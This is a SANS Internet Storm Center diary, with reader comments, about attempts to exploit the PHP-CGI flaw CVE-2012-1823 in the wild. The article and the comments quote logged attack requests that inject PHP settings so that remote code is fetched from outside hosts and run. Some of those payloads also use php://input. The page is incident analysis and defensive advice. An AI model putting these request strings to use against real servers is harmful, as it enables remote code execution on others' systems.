PHP vulnerability CVE-2012-1823 being exploited in the wild

PHP vulnerability CVE-2012-1823 being exploited in the wild
Reader Bob detected in his webserver the following string in the access log of his web server: bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)" This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 with the remote execution variant. Let's see what means each of the options invoked: safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree. disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual. allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor. allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed. auto_prepend_file=http://81.17.24.82/info3.php: This directive includes the PHP code located in http://81.17.24.82/info3.php and execute it before the code inside index.php. You can prevent this by using the latest stable PHP version located at the downloads page. If you are using windows, please be careful because you can be affected by the CVE-2012-2376. For more information regarding remediation on this vulnerability, please check my previous diary about it. Have you seen such logs in your access.log webserver file? We want to hear about it. Let us know! Manuel Humberto Santander Peláez SANS Internet Storm Center - Handler Twitter:@manuelsantander Web:http://manuel.santander.name e-mail:msantand at isc dot sans dot org	Manuel Humberto Santander Pelaacuteez 193 Posts ISC Handler May 28th 2012
Subscribe	May 28th 2012 8 years ago
Hi, I found those similars lines on my log from May 18 /var/log/apache2/other_vhosts_access.log.2.gz:www.siretessile.com:80 host-92-26-32-80.as13285.net - - [18/May/2012:19:00:52 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 1097 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)" /var/log/apache2/other_vhosts_access.log.2.gz:www.siretessile.com:80 71.216.169.47 - - [18/May/2012:21:42:11 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 1097 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)" I think that client is the source of attack. Then on error.log /var/log/apache2/error.log.2.gz:[Fri May 18 19:00:53 2012] [debug] proxy_util.c(1488): [client 92.26.32.80] proxy: http: found worker http://localhost:8080/ for http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt /var/log/apache2/error.log.2.gz:[Fri May 18 19:00:53 2012] [debug] proxy_util.c(2046): proxy: connecting http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080 /var/log/apache2/error.log.2.gz:[Fri May 18 19:00:53 2012] [debug] proxy_util.c(2139): proxy: connected /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080 /var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] proxy_util.c(1488): [client 71.216.169.47] proxy: http: found worker http://localhost:8080/ for http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt /var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] mod_proxy_ajp.c(575): proxy: AJP: declining URL http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt /var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] mod_proxy_http.c(1937): proxy: HTTP: serving URL http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt /var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] proxy_util.c(2046): proxy: connecting http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080 /var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] proxy_util.c(2139): proxy: connected /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080 How to know what was inside info3.txt ? Regards	Anonymous
Quote	May 28th 2012 8 years ago
This blog entry provides a lot of detail about this, including the content of info3.txt and even info2.txt: http://huguesjohnson.com/programming/hacking-attempt/ It is dated May 20th	Anonymous
Quote	May 28th 2012 8 years ago
We found similar log entries today, May 28. /var/www/logs/access_log:61.63.20.133 - - [28/May/2012:02:34:29 +0200] "GET /index.php?-n+-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://www.kihlborg.se/en/popups.txt+ HTTP/1.1" 200 18092 /var/www/logs/access_log:66.147.240.192 - - [28/May/2012:02:35:08 +0200] "GET /index.php?-n+-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://www.kihlborg.se/en/popups.txt+ HTTP/1.1" 200 18092 Inside the file www.kihlborg.se/en/popups.txt is this: <?php echo(63416);echo(214353451);echo(214353451);echo(8538568);exit;?> Regards	JanS 10 Posts
Quote	May 28th 2012 8 years ago
thank you for this info i will be checking my PHP logs to see if the same has come across sincerely, http://mjddesign.wordpress.com	Matthew 15 Posts
Quote	May 29th 2012 8 years ago
I have quite a few: http://pastebin.com/xHCr031f	fukawi2 2 Posts
Quote	May 29th 2012 8 years ago
I have a server with PHP52 and applied the backport-patch (via FreeBSD-ports). But the webs are still vulnerable to the above. The rewrite-rule seems to stop them - or blocking the net in Panama where the external code is downloaded from.	fukawi2 1 Posts
Quote	May 29th 2012 8 years ago
From May 16, only in access_log* (nothing in error_log*): /var/log/httpd/access_log.2:85.114.141.40 - - [16/May/2012:10:25:40 -0400] "POST //?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 200 1406 "-" "-"	fukawi2 1 Posts
Quote	May 29th 2012 8 years ago
The earliest one in my WAF log is 5/10/2012 (a day before the CVE posting), and they all are trying a POST. And we don't even use PHP, at all.	Shane 7 Posts
Quote	May 29th 2012 8 years ago

Reader Bob detected in his webserver the following string in the access log of his web server:

bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 with the remote execution variant. Let's see what means each of the options invoked:

safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.
disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual.
allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.
allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.
auto_prepend_file=http://81.17.24.82/info3.php: This directive includes the PHP code located in http://81.17.24.82/info3.php and execute it before the code inside index.php.

You can prevent this by using the latest stable PHP version located at the downloads page. If you are using windows, please be careful because you can be affected by the CVE-2012-2376. For more information regarding remediation on this vulnerability, please check my previous diary about it.

Have you seen such logs in your access.log webserver file? We want to hear about it. Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail:msantand at isc dot sans dot org

Manuel Humberto Santander Pelaacuteez

193 Posts
ISC Handler

May 28th 2012

Hi,

I found those similars lines on my log from May 18

/var/log/apache2/other_vhosts_access.log.2.gz:www.siretessile.com:80 host-92-26-32-80.as13285.net - - [18/May/2012:19:00:52 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 1097 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

/var/log/apache2/other_vhosts_access.log.2.gz:www.siretessile.com:80 71.216.169.47 - - [18/May/2012:21:42:11 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 1097 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

I think that client is the source of attack. Then on error.log

/var/log/apache2/error.log.2.gz:[Fri May 18 19:00:53 2012] [debug] proxy_util.c(1488): [client 92.26.32.80] proxy: http: found worker http://localhost:8080/ for http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
/var/log/apache2/error.log.2.gz:[Fri May 18 19:00:53 2012] [debug] proxy_util.c(2046): proxy: connecting http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080
/var/log/apache2/error.log.2.gz:[Fri May 18 19:00:53 2012] [debug] proxy_util.c(2139): proxy: connected /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080
/var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] proxy_util.c(1488): [client 71.216.169.47] proxy: http: found worker http://localhost:8080/ for http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
/var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] mod_proxy_ajp.c(575): proxy: AJP: declining URL http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
/var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] mod_proxy_http.c(1937): proxy: HTTP: serving URL http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
/var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] proxy_util.c(2046): proxy: connecting http://localhost:8080/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080
/var/log/apache2/error.log.2.gz:[Fri May 18 21:42:16 2012] [debug] proxy_util.c(2139): proxy: connected /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt to localhost:8080

How to know what was inside info3.txt ?

Regards

Anonymous

This blog entry provides a lot of detail about this, including the content of info3.txt and even info2.txt:
http://huguesjohnson.com/programming/hacking-attempt/

It is dated May 20th

Anonymous

We found similar log entries today, May 28.

/var/www/logs/access_log:61.63.20.133 - - [28/May/2012:02:34:29 +0200] "GET /index.php?-n+-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://www.kihlborg.se/en/popups.txt+ HTTP/1.1" 200 18092
/var/www/logs/access_log:66.147.240.192 - - [28/May/2012:02:35:08 +0200] "GET /index.php?-n+-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://www.kihlborg.se/en/popups.txt+ HTTP/1.1" 200 18092

Inside the file www.kihlborg.se/en/popups.txt is this:
<?php echo(63416);echo(214353451);echo(214353451);echo(8538568);exit;?>

Regards

JanS

10 Posts

thank you for this info i will be checking my PHP logs to see if the same has come across
sincerely,
http://mjddesign.wordpress.com

Matthew

15 Posts

I have quite a few:
http://pastebin.com/xHCr031f

fukawi2

2 Posts

I have a server with PHP52 and applied the backport-patch (via FreeBSD-ports). But the webs are still vulnerable to the above.
The rewrite-rule seems to stop them - or blocking the net in Panama where the external code is downloaded from.

fukawi2
1 Posts

From May 16, only in access_log* (nothing in error_log*):

/var/log/httpd/access_log.2:85.114.141.40 - - [16/May/2012:10:25:40 -0400] "POST //?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 200 1406 "-" "-"

fukawi2
1 Posts

The earliest one in my WAF log is 5/10/2012 (a day before the CVE posting), and they all are trying a POST. And we don't even use PHP, at all.

Shane

7 Posts